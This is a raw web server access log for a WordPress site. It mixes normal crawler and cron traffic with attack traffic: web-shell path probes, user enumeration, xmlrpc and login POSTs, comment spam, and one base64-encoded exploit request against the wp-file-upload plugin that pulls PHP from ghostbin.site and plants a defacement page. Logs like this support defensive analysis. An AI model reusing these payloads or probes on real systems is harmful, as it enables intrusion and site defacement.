172.200.235.115 - - [30/Mar/2025:15:27:51 -0400] "GET /wp-includes/sts.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:51 -0400] "GET /wp-includes/pomo/fgertreyersd.php.suspected HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:51 -0400] "GET /wp-includes/Requests/dropdown.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:51 -0400] "GET /wp-content/install.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:52 -0400] "GET /.well-known/admin.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:52 -0400] "GET /revision.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:52 -0400] "GET /css/sgd.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:53 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "-"
216.244.66.200 - - [30/Mar/2025:15:32:16 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.64.98 - - [30/Mar/2025:15:43:48 -0400] "GET /robots.txt HTTP/1.1" 200 131 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.98 - - [30/Mar/2025:15:43:48 -0400] "GET /wp-content/themes/chromenews/js/navigation.js?ver=20151215 HTTP/1.1" 200 1179 "https://shahmeenaindustry.com/orchard-sophia-developer-a-sanctuary-of-serenity/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.200 - - [30/Mar/2025:15:45:04 -0400] "GET /unlocking-the-ice-mastering-the-art-of-freezing-your-instagram-account/feed/ HTTP/1.1" 200 478 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
103.110.183.78 - - [30/Mar/2025:15:54:54 -0400] "GET /AdminBeat/login.asp HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
196.251.88.242 - - [30/Mar/2025:16:01:02 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:16:01:15 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:16:01:27 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
46.29.25.81 - - [30/Mar/2025:16:58:51 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
154.83.103.16 - - [30/Mar/2025:17:14:31 -0400] "GET /.git/HEAD HTTP/1.1" 403 1242 "-" "-"
216.244.66.200 - - [30/Mar/2025:17:53:29 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:18:00:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743372009.9178750514984130859375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [30/Mar/2025:18:00:06 -0400] "GET /the-power-of-games/ HTTP/1.1" 200 21026 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
43.153.96.233 - - [30/Mar/2025:18:29:28 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.200 - - [30/Mar/2025:18:39:47 -0400] "GET /robots.txt HTTP/1.1" 200 131 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.200 - - [30/Mar/2025:18:48:33 -0400] "GET /le-confort-et-lefficacite-un-apercu-des-meubles-de-bureau/feed/ HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
85.208.98.23 - - [30/Mar/2025:18:59:43 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
147.53.125.255 - - [30/Mar/2025:19:16:30 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
196.251.87.179 - - [30/Mar/2025:19:18:40 -0400] "GET /heh.php HTTP/1.1" 404 16531 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:19:18:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743376721.8075850009918212890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
196.251.87.179 - - [30/Mar/2025:19:18:43 -0400] "GET /NewFile.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:45 -0400] "GET /wp-content/plugins/view-more/ioxi.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:46 -0400] "GET /wp-content/plugins/erinyani/baxa1.php7 HTTP/1.1" 404 16533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:48 -0400] "GET /baxa1.php7 HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:50 -0400] "GET /wp-content/plugins/erinyani/baxa1.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:51 -0400] "GET /baxa1.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:53 -0400] "GET /wp-content/plugins/seoxx/randkeyword.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:57 -0400] "GET /github.php HTTP/1.1" 404 16533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:18:58 -0400] "GET /.well-known/github.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:19:01 -0400] "GET /assets/github.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:19:02 -0400] "GET /.well-known/acme-challenge/github.php HTTP/1.1" 404 16531 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:19:04 -0400] "GET /.well-known/pki-validation/github.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:19:05 -0400] "GET /assets/css/github.php HTTP/1.1" 404 16520 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:19:08 -0400] "GET /wp-content/themes/digital-download/up.php HTTP/1.1" 404 16532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
196.251.87.179 - - [30/Mar/2025:19:19:09 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
216.244.66.200 - - [30/Mar/2025:19:28:23 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:19:34:42 -0400] "POST /wp-cron.php?doing_wp_cron=1743377681.9209980964660644531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [30/Mar/2025:19:34:38 -0400] "GET /page/102/ HTTP/1.1" 200 20947 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
182.44.9.147 - - [30/Mar/2025:20:06:21 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.200 - - [30/Mar/2025:20:13:34 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.200 - - [30/Mar/2025:20:19:34 -0400] "GET /category/activity/page/97/ HTTP/1.1" 200 21581 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:20:21:11 -0400] "POST /wp-cron.php?doing_wp_cron=1743380470.8323340415954589843750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [30/Mar/2025:20:21:08 -0400] "GET /football-kit-shops-for-everyone/feed/ HTTP/1.1" 200 438 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.174.156.124 - - [30/Mar/2025:20:25:28 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
185.174.156.124 - - [30/Mar/2025:20:25:32 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
46.148.206.226 - - [30/Mar/2025:20:44:53 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
216.244.66.200 - - [30/Mar/2025:21:44:52 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.200 - - [30/Mar/2025:21:53:31 -0400] "GET /navigating-the-thrills-and-risks-of-online-casinos/feed/ HTTP/1.1" 200 457 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
41.140.4.245 - - [30/Mar/2025:22:03:39 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
173.245.207.242 - - [30/Mar/2025:22:53:37 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:22:53:38 -0400] "POST /wp-cron.php?doing_wp_cron=1743389618.7106359004974365234375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
173.245.207.242 - - [30/Mar/2025:22:53:38 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.200 - - [30/Mar/2025:23:17:00 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
138.219.122.48 - - [30/Mar/2025:23:17:16 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:23:17:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743391039.9848010540008544921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
138.219.122.48 - - [30/Mar/2025:23:17:17 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 1168 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
138.219.122.48 - - [30/Mar/2025:23:17:20 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:23:24:13 -0400] "POST /wp-cron.php?doing_wp_cron=1743391452.8333311080932617187500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [30/Mar/2025:23:24:12 -0400] "GET /revolutionizing-casino-dynamics/ HTTP/1.1" 200 21277 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:23:32:36 -0400] "POST /wp-cron.php?doing_wp_cron=1743391956.2652530670166015625000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [30/Mar/2025:23:32:32 -0400] "GET /photographer-santorini-a-photographers-paradise/feed/ HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
196.251.69.226 - - [30/Mar/2025:23:59:48 -0400] "POST /wp-content/plugins/wp-ver.php HTTP/1.1" 403 1242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.166.134.47 - - [31/Mar/2025:00:16:13 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.55.37.107 - - [31/Mar/2025:00:27:43 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:00:27:44 -0400] "POST /wp-cron.php?doing_wp_cron=1743395264.2882161140441894531250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
45.55.37.107 - - [31/Mar/2025:00:27:44 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.55.37.107 - - [31/Mar/2025:00:27:45 -0400] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.55.37.107 - - [31/Mar/2025:00:27:45 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
91.202.4.43 - - [31/Mar/2025:00:31:56 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
172.98.54.81 - - [31/Mar/2025:00:32:39 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:112.0) Gecko/20100101 Firefox/112.0"
172.98.54.81 - - [31/Mar/2025:00:32:40 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
216.244.66.200 - - [31/Mar/2025:00:49:11 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.200 - - [31/Mar/2025:00:54:38 -0400] "GET /best-pc-builder-website/ HTTP/1.1" 200 20854 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.64.98 - - [31/Mar/2025:00:57:12 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.99 - - [31/Mar/2025:00:57:12 -0400] "GET /wp-content/themes/chromenews/js/navigation.js?ver=20151215 HTTP/1.1" 304 0 "https://shahmeenaindustry.com/exploring-rainbow-riches-casinos-a-colorful-gaming-experience/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.114.83 - - [31/Mar/2025:01:09:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743397768.5152330398559570312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
156.249.204.175 - - [31/Mar/2025:01:09:27 -0400] "GET /star-plus-plumbing/ HTTP/1.1" 200 21213 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
156.249.204.175 - - [31/Mar/2025:01:09:53 -0400] "GET /category/sign-up/ HTTP/1.1" 200 17828 "https://shahmeenaindustry.com/star-plus-plumbing/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.249.204.175 - - [31/Mar/2025:01:10:18 -0400] "GET /category/sign-up/ HTTP/1.1" 200 17828 "https://shahmeenaindustry.com/category/sign-up/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.249.136.215 - - [31/Mar/2025:01:10:22 -0400] "GET /category/sign-up/ HTTP/1.1" 200 17828 "https://shahmeenaindustry.com/category/sign-up/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
66.249.64.98 - - [31/Mar/2025:01:34:11 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.98 - - [31/Mar/2025:01:34:40 -0400] "GET /wp-content/themes/chromenews/assets/toggle-script.js?ver=4.9.3 HTTP/1.1" 200 499 "http://shahmeenaindustry.com/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.98 - - [31/Mar/2025:01:34:40 -0400] "GET /wp-content/themes/chromenews/assets/slick/js/slick.min.js?ver=4.9.3 HTTP/1.1" 304 0 "http://shahmeenaindustry.com/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.230.52.52 - - [31/Mar/2025:01:52:38 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
195.26.225.218 - - [31/Mar/2025:02:06:42 -0400] "GET /how-to-get-the-most-out-of-a-jade-roller/ HTTP/1.1" 200 21756 "http://shahmeenaindustry.com/how-to-get-the-most-out-of-a-jade-roller/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
195.26.225.218 - - [31/Mar/2025:02:06:43 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com/how-to-get-the-most-out-of-a-jade-roller/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:02:06:48 -0400] "POST /wp-cron.php?doing_wp_cron=1743401206.0215458869934082031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
198.54.114.83 - - [31/Mar/2025:02:09:31 -0400] "POST /wp-cron.php?doing_wp_cron=1743401371.3686969280242919921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
139.135.241.146 - - [31/Mar/2025:02:09:27 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
103.74.103.248 - - [31/Mar/2025:02:09:34 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:92.0) Gecko/20100101 Firefox/92.0"
176.67.83.246 - - [31/Mar/2025:02:16:17 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
176.67.83.246 - - [31/Mar/2025:02:16:18 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
198.54.114.83 - - [31/Mar/2025:02:17:02 -0400] "POST /wp-cron.php?doing_wp_cron=1743401821.8858261108398437500000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
196.32.220.226 - - [31/Mar/2025:02:17:01 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
216.244.66.200 - - [31/Mar/2025:02:18:00 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [31/Mar/2025:02:25:08 -0400] "POST /wp-cron.php?doing_wp_cron=1743402308.0017640590667724609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [31/Mar/2025:02:25:03 -0400] "GET /die-vielfalt-der-formen-und-materialien/feed/ HTTP/1.1" 200 443 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [31/Mar/2025:02:27:44 -0400] "POST /wp-cron.php?doing_wp_cron=1743402464.2392339706420898437500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
2603:3:6106:3ce0:: - - [31/Mar/2025:02:27:42 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
85.208.98.23 - - [31/Mar/2025:02:40:42 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [31/Mar/2025:02:49:06 -0400] "POST /wp-cron.php?doing_wp_cron=1743403746.2531530857086181640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
198.54.114.58 - - [31/Mar/2025:02:49:03 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
216.244.66.200 - - [31/Mar/2025:03:02:46 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
